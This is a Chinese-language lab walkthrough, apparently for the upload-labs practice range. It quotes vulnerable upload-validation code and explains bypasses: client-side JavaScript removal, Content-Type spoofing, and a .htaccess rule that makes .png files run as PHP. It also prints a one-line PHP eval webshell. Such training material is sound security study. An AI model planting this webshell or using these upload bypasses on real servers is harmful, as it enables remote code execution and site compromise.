Pass-01 ?JS检查
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
此关卡使用了JavaScript对上传的文件做了黑名单限制。限制是基于前端页面;因此我们可以通过禁用JavaScript或使用Burpsuite截获数据包进行修改实现危险文件的上传。从而绕过文件上传限制。
实现思路一:禁用Javascript
在Proxy模块中的Option下Response Modification,勾选Remove all JavaScript
?再次回到Intercept页面点击Forward即可上传成功。
实现思路二:使用Burpsuite截获数据包进行修改?
使用Burpsuite上传一个允许上传的文件类型如.jpg文件或.png允许的文件,之后使用Burpsuite进行数据包的截取,将filename后面的 shell.png修改为shell.php之后。点击Forward即可绕过。
??
?Pass-02 Content-Type检查
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';
}
}本关卡使用php对文件上传做了MIME类型限制。对上传的文件类型进行了限制。限制了Content-Type字段的MIME类型。只允许Connect-Type为image/jpeg或者image/png再或者image/gif进行上传,也就是说只允许上传图片。那么我们可以通过上传一个test.php文件。进行Burpsuite的数据包修改。将原本的text/php (PHP文件的MIME) 修改为image/png (PNG图片的MIME)。即可成功绕过。
实现思路一:修改Content-Type字段:
Pass-04?上传.htaccess文件绕过
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}通过源码我们发现目标服务器设置了黑名单限制,它过滤了.php,.php5,.asp,.aspx,.php,jsp等等呢个结尾的文件,也就是说它过滤了几乎所有的后端语言脚本。那么我们可以通过上传.htaccess配置文件进行绕过。
? ? ? ? .htaccess文件是Apache独有的分布式配置文件。全称是Hypertext Access(超文本入口)提供了针对目录改变配置的方法。,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。
在用户请求页面的某个文件的时候,Apache中间件查找网站根目录下的(包含子目录)所有.htaccess文件。以完成Apache的配置。
那么我们可以针对此点,创建htaccess文件,因为.htaccess文件以点开头属于特殊文件,不允许直接被创建,我们可以使用Windows 环境下的cmd 中的rename 命令 重命名htaccess文件将其重命名为.htaccess 的命令为rename htaccess .htaccess 或者 使用Burpsuite截获数据包修改数据包的filename字段。修改为.htaccess即可。
htaccess的文件创建完成之后,我们编辑此文件,添加内容 AddType Application/x-httpd-php .png?这句话的意思为 “告诉Apache,以后你将用户请求的所有点后缀为png的文件,全部给我解析为.php文件处理。不得有误”。因此我们上传一个允许上传的文件类型。.png 即可完成绕过。
实验实现:
?先上传httaccess文件,使用Burpsuite截获数据包将filename字段的htaccess修改为.htaccess(由于我们不能直接创建点开头的文件)。可以看到.htaccess文件的内容为AddType Application/x-httpd-php .png (将.png文件解析为.php执行)点击ForWard发送即可。
接着我们编辑shell.php文件,文件内容为我们的一句话木马。<?php @eval($_POST['cmd']); ?>
将shell.png文件重命名为shell.png(由于我们上传了.htaccess文件 将.png文件解析为.php文件执行)在Pass-04页面直接上传即可(因为网站允许.png文件类型的文件上传)。
我们通过访问url:http://靶场的IP地址/upload/shell.png 即可访问到我们的一句话木马文件。